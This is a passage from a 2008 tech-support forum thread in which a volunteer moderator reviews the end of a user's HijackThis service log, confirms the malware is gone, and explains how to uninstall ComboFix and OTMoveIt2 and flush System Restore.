O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - c:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: Windows XP FUS Manager (DPFUSMgr) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DPFUSMgr.exe
O23 - Service: Biometric Authentication Service (DpHost) - DigitalPersona, Inc. - C:\Program Files\DigitalPersona\Bin\DpHost.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: NVIDIA Display Driver Service (NVSvc) - NVIDIA Corporation - C:\WINDOWS\system32\nvsvc32.exe
O23 - Service: SAVRoam (SavRoam) - symantec - c:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - c:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - c:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Trackback Poster (TS Poster) - GungHo Technologies LLC - C:\Program Files\Trackback Spider\Poster Service.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: Webroot CommAgent Service (WebrootCommAgentService) - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\CommAgent.exe
O23 - Service: WebrootSpySweeperService - Webroot Software, Inc. - C:\Program Files\Webroot\Enterprise\Spy Sweeper\SpySweeper.exe

--
End of file - 12204 bytes
cybertech's Avatar
Computer Specs
Moderator with 68,029 posts.
  
Join Date: Apr 2002
Location: Washington State
10-Apr-2008, 12:36 PM #12
Looks fine. How is it running now? Any problems?
anthon69's Avatar
Junior Member with 9 posts.
  
Join Date: Apr 2008
11-Apr-2008, 01:46 PM #13
Everything seems to be working great!

Thanks a million!!
Much appreciated
cybertech's Avatar
Computer Specs
Moderator with 68,029 posts.
  
Join Date: Apr 2002
Location: Washington State
11-Apr-2008, 02:54 PM #14
Follow these steps to uninstall Combofix and tools used in the removal of malware
  • Click START then RUN
  • Now type Combofix /u in the runbox and click OK. Note the space between the X and the U, it needs to be there.


You can and should remove all of the tools I requested you to download and/or folders associated with them now. It is pointless to keep these tools around as they are updated so frequently that the tools can be outdated within a few days, sometimes within just hours.

OTMoveIt2 by OldTimer has a CleanUp! option you can use to remove most of the fixes and associated files and folders.
  • Make sure you have an Internet Connection.
  • Double-click OTMoveIt2.exe to run it.
  • Click on the CleanUp! button
  • A list of tool components used in the Cleanup of malware will be downloaded.
  • If your Firewall or Real Time protection attempts to block OtMoveit2 to rech the Internet, please allow the application to do so.
  • Click Yes to beging the Cleanup process and remove these components, including this application.
  • You will be asked to reboot the machine to finish the Cleanup process. If you are asked to reboot the machine choose Yes.


It's a good idea to Flush your System Restore after removing malware:
Turn off system restore and then turn it back on: http://support.microsoft.com/kb/310405



Now you should Clean up your PC


Here are some additional links for you to check out to help you with your computer security.

How did I get infected in the first place.

Good free tools and advice on how to tighten your security settings.

Security Help Tools



You're welcome!
__________________
Microsoft MVP/Windows - Consumer Security
Closed Thread Bookmark and Share

THIS THREAD HAS EXPIRED.
Are you having the same problem? We have volunteers ready to answer your question, but first you'll have to join for free. Need help getting started? Check out our Welcome Guide.

Smart Search

Find your solution!

« Previous Thread | Malware Removal & HijackThis Logs | Next Thread »

Currently Active Users Viewing This Thread: 1 (0 members and 1 guests)
 
WELCOME TO TECH SUPPORT GUY! Are you looking for the solution to your computer problem? Join our site today to ask your question -- for free! Our site is run completely by volunteers who want to help you solve your computer problems. See our Welcome Guide to get started.

Thread Tools


Twitter Twitter! | Podcast | Mobile | Advertise
Contact Us - HelpOnThe.Net - Archive - Terms of Service - Top
You Are Using:
Server ID
Advertisements do not imply our endorsement of that product or service.
All times are GMT -5. The time now is 02:32 PM.
Copyright © 1996 - 2009 TechGuy, Inc. All rights reserved.
Powered by vBulletin, Copyright © 2000 - 2009, Jelsoft Enterprises Ltd.
 Powered by Cermak Technologies, Inc.